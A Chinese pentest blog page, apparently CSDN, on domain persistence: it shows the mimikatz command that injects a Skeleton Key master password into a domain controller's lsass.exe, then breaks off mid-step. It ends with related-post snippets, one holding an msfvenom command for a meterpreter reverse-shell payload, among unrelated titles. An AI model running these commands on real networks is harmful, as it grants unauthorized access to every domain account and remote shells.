域权限维持

Skeleton Key(万能密码)

原理

当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。

PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的域环境中,域控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。

实验

1、在域控机器上输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程:

mimikatz.exe "privilege::debug" "misc::skeleton" exit

这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz”。

2、建立与域控

[内网渗透]—权限维持相关推荐

  1. 内网渗透-----权限分析及防御

    第四章 权限提升分析及防御 生成MSF木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.2 lport=1234 -f exe ...

  2. linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结

    在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...

  3. 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

    内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...

  4. 内网渗透测试:Windows权限提升思路

    我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows系统内核溢 ...

  5. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  6. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  7. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  8. 【内网渗透工具】炫彩蛇安装教程

    点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...

  9. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

最新文章

  1. 初识好朋友计算机课件,初识电脑朋友.ppt
  2. Qt Creator连接裸机设备
  3. 百度地图大数据告诉你一线城市真相
  4. Git教程学习总结(分享给热爱学习的你,团队的协作离不开你呀)
  5. linux桌面xfce美化_使用Xfce Linux桌面环境的8个理由
  6. * poj 1062 昂贵的礼物 dijkstra 枚举区间
  7. Google 正式抛弃 HTTP!
  8. JavaScript人脸检测的实现方法
  9. hdu5358 ( First One )数学+思维
  10. Linux下 PHP 安装ioncube扩展
  11. 开启Apache一直出现443端口被占用
  12. win10专业版 hyper-v 找不到
  13. UEFI Application
  14. timer延迟1us_STM32 Systick定时器在实现1us延时的问题与解决
  15. uniapp 微信小程序地图,在高德app、腾讯app、百度app、苹果地图app 中打开
  16. unity 3d如何隐藏物体
  17. vivado 2018.2官方下载
  18. Unity 修改场景中人型骨骼模型的骨骼旋转角度
  19. Arduino学习之二——舵机控制
  20. 算法系列之九:计算几何与图形学有关的几种常用算法(二)

热门文章

  1. Error Code: 1318. Incorrect number of arguments for PROCEDURE student.new_procedure; expected 0, got
  2. 达梦使用powerdesigner生成er模型图
  3. Flash打开其他外部EXE软件
  4. 北京十大it外包公司
  5. java 验证手机号码、电话号码(包括最新的电信、联通和移动号码) 1
  6. Cuckoo针对恶意软件自动化分析系统
  7. [转]如何学习《离散数学》?
  8. 鼠标移动到的地方一直往右移动的解决办法
  9. 3DCNN参数解析:2013-PAMI-3DCNN for Human Action Recognition
  10. cocos2d中遇到棱形组成的方块进行点击判断位置